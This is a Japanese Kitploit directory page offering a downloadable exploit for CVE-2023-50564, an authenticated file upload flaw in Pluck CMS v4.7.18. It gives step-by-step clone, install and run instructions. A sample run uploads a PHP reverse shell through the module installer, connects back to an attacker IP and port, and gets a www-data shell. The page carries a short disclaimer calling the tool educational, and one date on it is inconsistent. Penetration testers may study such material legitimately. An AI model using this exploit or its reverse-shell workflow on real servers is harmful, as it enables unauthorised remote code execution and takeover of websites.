Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mrterrestrial/cve-2023-50564
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubmrterrestrial/cve-2023-50564

CVE-2023-50564

このスクリプトは、Pluck CMS v4.7.18 のファイルアップロード機能の脆弱性を悪用して悪意のある PHP ファイルをアップロードし、リバースシェルによるリモートアクセスを可能にします。アップロードされると、このバックドアにより攻撃者は Web サーバーの権限でサーバーにアクセスでき、システムまたはネットワーク内でのさらなる操作が可能になります。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-50564 - Pluck CMS v4.7.18 エクスプロイト

概要

このスクリプトは、Pluck CMS v4.7.18(CVE-2023-50564)の認証済み任意ファイルアップロードの脆弱性を悪用します。この脆弱性を悪用することで、認証済みの攻撃者は悪意のある PHP ファイルをアップロードし、任意のコードを実行できるようになります(この場合はリバースシェル)。

エクスプロイトの詳細

  • CVE ID: CVE-2023-50564
  • 影響を受けるバージョン: Pluck CMS v4.7.18
  • 種別: 認証済み任意ファイルアップロード
  • 影響: リモートコード実行(RCE)

この脆弱性は /admin.php?action=installmodule エンドポイントに存在し、認証済みユーザーが任意のファイルを含む ZIP ファイルをアップロードすることを許可します。悪意のある PHP ファイルをアップロードすることで、このエクスプロイトは攻撃者へのリバースシェルを確立します。

必要条件

  • Python 3.x
  • requests モジュール: pip install requests
  • requests-toolbelt モジュール: pip install requests-toolbelt

また、このスクリプトは Pluck CMS インスタンスの有効なログイン情報(ターゲットの URL とパスワード)を必要とします。

エクスプロイトの機能

  • リバースシェル: エクスプロイトは PHP リバースシェルをターゲットにアップロードし、攻撃者のマシンに接続を戻します。
  • 対話型コマンド実行: リバースシェルが確立されると、ターゲット上でコマンドを対話的に実行できます。
  • パスワードプロンプト検出: エクスプロイトはパスワードプロンプト(例: su、sudo -l)を検出し、ユーザーが手動で入力を提供できるようにします。

使用方法

エクスプロイトを実行する手順

  1. リポジトリをクローンする:
    root@kitploit:~
    git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
    cd Pluck-CMS-Exploit
    
  2. 必要な Python パッケージをインストールする: 必要なパッケージがインストールされていることを確認してください:
root@kitploit:~
pip install requests requests-toolbelt
  1. エクスプロイトを実行する: このスクリプトには 4 つの入力が必要です: ターゲット URL、CMS のパスワード、あなたの IP アドレス(リバースシェル用)、および待ち受けたいポートです。

Python を使用してエクスプロイトを実行します:

root@kitploit:~
 python3 exploit.py
  1. プロンプトが表示されたら入力する:
  • ターゲット URL を入力してください(例: example.com)。
  • CMS で認証するためのパスワードを入力してください。
  • リバースシェル接続用の IP アドレスを入力してください。
  • リバースシェルを待ち受けるポートを入力してください。
  1. 対話型シェル: リバースシェルが確立されると、ターゲットシステムとやり取りするための Shell> プロンプトが表示されます。

例:

root@kitploit:~
 $ python3 exploit.py
 Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
 Enter the password for target authentication: password123
 Enter your IP (for reverse shell): 10.10.14.5
 Enter the port to listen on (for reverse shell): 4444
 [*] Authenticating to the target...
 [+] Authentication successful.
 [*] Generating reverse shell PHP file...
 [+] Reverse shell PHP file created successfully as 'shell.php'.
 [*] Creating ZIP payload...
 [+] ZIP file created as 'payload.zip'.
 [*] Starting reverse shell listener on 10.10.14.5:4444 ...
 [*] Uploading payload to the target...
 [+] Payload uploaded successfully.
 [*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
 [+] Connection received from ('10.10.10.1', 55678)
 Shell> whoami
 www-data

エクスプロイトの解説

  • 認証: スクリプトは提供された認証情報を使用して CMS にログインします。
  • ファイルアップロード: PHP リバースシェルを含む ZIP アーカイブを作成し、脆弱なエンドポイント(/admin.php?action=installmodule)にアップロードします。
  • リバースシェル: スクリプトはアップロードした PHP ファイルをトリガーし、攻撃者のマシンへのリバースシェル接続を確立します。

CVE の詳細

  • CVE ID: CVE-2023-50564
  • 脆弱なエンドポイント: /admin.php?action=installmodule
  • 脆弱なバージョン: Pluck CMS v4.7.18
  • 種別: 認証済み任意ファイルアップロード

免責事項

このスクリプトは教育目的および倫理的なハッキングを目的としています。テストする明示的な許可がある環境でのみ使用してください。作者はこのツールの誤用について一切責任を負いません。

ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は MIT License をご覧ください。

コントリビューション

リポジトリをフォークしてプルリクエストを送信してください。問題や機能リクエストがある場合は、GitHub で issue を開いてください。

ツールをダウンロード